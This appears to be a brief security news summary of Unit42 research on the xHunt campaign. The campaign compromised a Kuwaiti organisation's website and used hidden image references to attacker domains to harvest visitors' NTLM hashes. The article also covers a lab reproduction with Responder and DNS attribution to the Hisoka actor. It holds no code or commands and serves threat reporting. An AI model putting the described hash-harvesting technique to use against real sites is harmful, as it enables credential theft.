xHunt campaign knows to be active since July 2018 and they target the transportation and shipping organizations based in Kuwait.
The attack campaign named xHunt, because they used the name of the tools from the character names of the series Hunter x Hunter.
xHunt Campaign Activities
Unit42 researchers spotted a new XHunt attack campaign that compromises Kuwaiti organization’s webpage and used it as a watering hole.
The attackers stored hidden image files on the website between June and December 2019. Earlier the referenced microsofte-update[.]com and later changed to learn-service[.]com.
The attack was aimed to harvest the account credentials in the form of NTLM hashes from the webpage’s visitors.
By having the NTLM handshake and other information they could crack the hashes and obtain the username and password or launch a relay attack.
To test further researchers set up the Responder tool on a server and configured the environment to have the domain microsofte-update[.]com resolve to the server.
“We then visited the website from another system in our lab that had the HTML code injected and observed the Responder tool gathering the domain name, user name, IP address and NTLM hashes from the system on which we visited the website.”
Further DNS analysis on the Kuwaiti organization’s webpage reveals that another organization within Kuwait began resolving to infrastructure utilized by the xHunt operators.
Here is the DNS activity timeline of Sakabota and Hisoka DNS.
- Top row – targeted organizations
- Middle row – Infrastructure
- Bottom row – xHunt domains
Attackers also obtained Let’s Encrypt SSL certificates that contained the name of the redirected domain.
Researchers believe the same threat actor group behind bot the Hisoka attack campaign and xHunt attack Campaign.